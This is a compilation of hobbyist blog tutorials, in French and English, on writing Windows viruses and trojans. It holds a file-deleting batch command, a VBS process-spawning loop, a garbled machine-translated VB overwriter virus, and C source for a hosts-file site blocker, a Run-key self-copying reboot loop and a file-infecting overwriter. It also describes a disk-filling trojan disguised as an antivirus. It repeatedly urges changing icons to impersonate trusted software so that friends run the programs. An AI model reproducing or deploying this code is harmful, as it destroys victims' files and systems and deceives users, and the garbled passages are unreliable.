Créer un virus trojan

Créer un virus trojan

parti:1

Bonjour à tous.

Aujourd’hui j’ai choisi de parler à propos
des virus, on
entend beaucoup parler, on a tous été
infecter un jour ou
l’autre par ces programmes. Parce que
avant tous un virus
est un programme.

Nous allons donc voir comment ça
fonctionne mais aussi
comment en créer ; bien sur !

Dans cette première partie, nous allons
commencer avec
des virus plutôt simple vous allez le voir :

Les Virus VB (Visual Basic):

Ce type de virus sont les plus anciens et ont été
parmi les
premiers à être apparus.

Créer un petit virus pas très méchant...

Avant toute chose je tiens a vous avertir que cette article
n'est là que dans un but
pédagogique, et vous n'étes nullement incités à reprtoduire
ceci sur votre pc. Vous etes

donc résponsable de vos actes et ni moi ni mon hébérgeur
ne seons tenu pour responsable.

Nous allons apprendre à créer un petit virus en *bat. :

C’est partit :

Pour commencer, ouvrez votre editeur de
texte prèfèré (ex : bloc-note).
Ensuite, tapes
sans sauter de ligne :


del C :windows*.bmp cls


Après, enrigistrer le code avec l’extension *.bat

Attention : N’ouvrez en aucun cas le fichier sur
votre ordinateur,
le virus s’exécutera !

Comment ça marche, explications:

del C:windows*.bmp

del : sert à supprimer
C:windows : situe le dossier où la commande doit avoir lieu
* : suivit d'une extension désigne tous les dossiers portant
cette extension dans l'exemple l'extension est *.bmp .Donc
ce mini virus supprimera tous les fichiers portant l'extension
*.bmp (en locurrence des images) se trouvant dans windows.

Ce virus pourrait être plus dangereux si vous changiez
l’extension en une autre plus importante, mais la, je laisse
libre choix à votre imagination !^^

Créer un virus plus méchant…

vous rêvez de savoir planter des pc très facilement ?^^

C’est partit :

Commencez, par ouvrir votre editeur de text.
Ensuite, tapes le code suivant :


Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop

Après, enregistrez le avec le nom que vous voulez, avec l’extension .vbs

Petite précision :

Ici, le bloc-note (celui de windows) représente l'application
désirée, vous pouvez la remplacer par une application plus lourde
(pour des résultats plus rapides et meilleurs).
false : signifie que les fenêtres ne doivent pas être initialisées,
seulement les processus pour que la victime ne se rende pas compte.
Loop : signifie que ça doit se faire en boucle : ça doit lancer le
bloc-note, recommencé et ainsi de suite.

Ces virus ont été créé en Visual Basic, si vous voulez aller plus loin
dans la création de virus apprenez le Visual Basic (qui est un
langage de programmation plutôt simple)

Dans la deuxième partie du cours nous verrons
des échantillons de vrais virus bien méchant !

Si vous voulez un bon tuto : "Apprendre le Visual
basic simplement" laissez des coms.

...............................................................................................................................................................

parti:2

Les virus informatiques sont sous
de nombreuses formes avec de
nombreuses fonctions différentes.
Certains sont plutôt simplistes et
peuvent être détectés par
l'utilisateur moyen tandis que
d'autres sont complexes et
passent inaperçus pendant
un certain temps. Les virus les plus courants
relevant de la classification des infecteurs de fichiers,
qui fonctionnent en infectant des fichiers exécutables.
Ils y parviennent en insérant leur code malveillant
dans une zone du fichier d'origine, lui permettant
d'être exécutée chaque fois que le fichier est
accessible Certains d'entre eux sont capables de
complètement écraser un fichier, ce qui rend tout un programme inutile.

C’est le cas de ce type de virus que nous allons voir aujourd’hui.
Les virus Overwritters.

Je sais que les virus overwritters , n'ont malheureusement plus aucune
chance de se propager et ils ne sont pas "intelligent". Malgré tout cela
overwritters peut vous aider à comprendre les bases du VRAI virus.
Je vais vous donner le code d'abord et ensuite on va le passer en revue.

-=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-=

Option Explicit Option Explicit

Dim myarray() As Byte myarray Dim () As Byte

Dim victim As String victime Dim As String

Const mysize As Integer = 11776 mysize
Const As Integer = 11776

Private Sub Form_Load()
Private Sub Form_Load ()

On Error Resume Next On Error Resume Next

Dim Free Dim gratuit

Free = FreeFile Free = FreeFile

Open App.Path & "\" & App.EXEName &
".exe" For Binary Access Read As #Free
Open App.Path & "\" & & App.EXEName
". Exe" pour l'accès binaire Lire Comme # Free

ReDim myarray(mysize) ReDim MonTableau (mysize)

Get #1, 1, myarray Obtenez myarray # 1, 1,

Close #Free Close # Free

victim = Dir(App.Path & "\" &
"*.EXE") victime = Dir (App.Path &
"\" & "*. exe")

While victim <> "" Bien que victime <> ""

Open App.Path & "\" & victim For
Binary Access Write As #Free Open App.Path
& "\" & victime pour l'accès binaire
Ecrivez comme # Free

Put #1, , myarray Put # 1,, myarray

Put #1, , mysize Put # 1,, mysize

Close #Free Close # Free

victim = Dir() victime = Dir ()

Wend Wend

End End

End Sub End Sub

  -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-=

Décodons tout cela : (miam ! J)

Option Explicit Option Explicit

Dim myarray() As Byte myarray Dim
() As Byte

Dim victim As String victime Dim As String

Const mysize As Integer = 11776
mysize Const As Integer = 11776

Ici, nous définissons les variables que nous allons utiliser, le "myarray ()"
variable qui contient le code binaire du virus, "victime" est la variable qui
contient le nom du fichier de la victime et le "mysize" variable
contient la taille du virus.

Private Sub Form_Load() Private Sub
Form_Load ()

On Error Resume Next On Error Resume Next

Nous ouvrons le sous dossier que nous allons utiliser (Form_Load),
et nous avons mis notre erreur poignée c'est-à-dire qu’en cas
d’erreur le programme s’arrêtera là.

Dim Free Dim gratuit

Free = FreeFile Free = FreeFile

C'est une bonne idée de prendre exemple sur le virus y2k.
Cela vous débarrasse de la lecture / écriture des erreurs, car il est open source.

Open App.Path & "\" & App.EXEName &
".exe" For Binary Access Read As #Free
Open App.Path & "\" & & App.EXEName
". Exe" pour l'accès binaire Lire Comme # Free

ReDim myarray(mysize) ReDim MonTableau
(mysize)

Get #1, 1, myarray Obtenez myarray # 1, 1,

Close #Free Close # Free

Maintenant, nous allons sortir le code binaire de nos virus et
nous allons le stocker dans la variable "myarray".

victim = Dir(App.Path & "\" &
"*.EXE") victime = Dir (App.Path &
"\" & "*. exe")

While victim <> "" Bien que victime <> ""

Open App.Path & "\" & victim For
Binary Access Write As #Free Open
App.Path & "\" & victime pour l'accès
binaire Ecrivez comme # Free

Put #1, , myarray Put # 1,, myarray

Put #1, , mysize Put # 1,, mysize

Close #Free Close # Free

Ici, nous définissons la variable « victime » et nous avons mis notre
code binaire dans le programme de la victime.

victim = Dir() victime = Dir ()

Wend Wend

Puis nous avons mis la victime à zéro, et nous répétons l'ensemble
du processus d'infecter tous les fichiers. Exe dans le répertoire courant.

End End

End Sub End Sub

Et enfin, nous fermons le programme et les sous dossiers.

How to Make a Trojan Horse

How to Make a Trojan Horse

Most of you may be curious to know about how to make a Trojan or Virus on your own. Well, here is an answer to your curiosity. In this, post I’ll show you how to make a simple trojan on your own using C programming language. This trojan when executed will eat up the hard disk space on the root drive (The drive on which the Windows is installed, usually C: Drive) of the computer on which it is run. Also, this trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run.

So, I’ll call this as Space Eater Trojan. Since this program is written using a high level programming language, it is often undetected by antivirus programs. The source code for this program is available for download at the end of this post. Let’s see how this trojan works:

Before I move on to explain the working of this program, you need to know what exactly is a Trojan horse and how it works. Unlike what many of us think, a trojan horse is not a virus. In simple words, it is just a program that appears to do a favorable task but in reality performs undisclosed malicious functions that allow the attacker to gain unauthorized access to the host machine or cause a damage to the computer.

Now lets move to the working of our Trojan:

The trojan horse which I have created appears itself as an antivirus program that scans the computer for malware programs. However, in reality it does nothing other than eating up the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result, the the root drive gets filled up completely with in minutes of running this program.

Once the disk space is full, the trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any of the cleanup program. This is because, the trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension it is often ignored by the disk cleanup software. Hence there is now way to recover the hard disk space other than reformatting the drive.

The algorithm of the Trojan is as follows:

1. Search for the root drive
2. Navigate to %systemroot%\Windows\System32 on the root drive
3. Create the file named “spceshot.dll“,
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full.
5. Once the drive is full, stop the process.

You can download the Trojan source code HERE. Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.

How to compile, test and fix the damage?

Compilation:

For step-by-step compilation guide, refer my post How to compile C Programs.

Testing:

To test the trojan,  just run the SpaceEater.exe file on your computer. It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to fix the damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box:

%systemroot%\system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

 NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?

A Virus Program to Disable USB Ports

A Virus Program to Disable USB Ports

In this post, I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual, I am using my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you’ll will not be able to use your pen drive or any other USB peripheral devices on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.
   It contains the following 2 files:
   • block_usb.c (source code)
   • unblock_usb.c (source code)
2. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
   3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
3. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
4. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

How it Works?

The idea behind the working of this virus is pretty straightforward. It works by gaining access to the Windows registry and modifying it’s settings to disable the USB device support on the computer.

On the other hand, the other program will re-set the registry settings back to the normal so that the support for USB devices is re-enabled. I hope you like this post. Please pass your comments.

A Virus Program to Block Websites

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IEor Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

For step-by-step compilation guide, refer my post How to compile C Programs.

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1                                google.com

5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

A Virus Program to Restart the Computer at Every Startup

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C languagethen it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

 

Compiling The Scource Code Into Executable Virus.

 

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

 

Testing And Removing The Virus From Your PC

 

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

 

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System

(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

 

Logic Behind The Working Of The Virus

 

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

 

LOGIC:

 

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click theSysres.exe file.The restarting process will occur from the next boot of the system.

 

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

 

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

How to Create a Computer Virus?

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Related Posts:

1. A Virus Program to Restart the Computer at Every Startup
2. A Virus Program to Block Websites
3. a-virus-program-to-disable-usb-ports

By using/following this site you agree to our Legal Disclaimer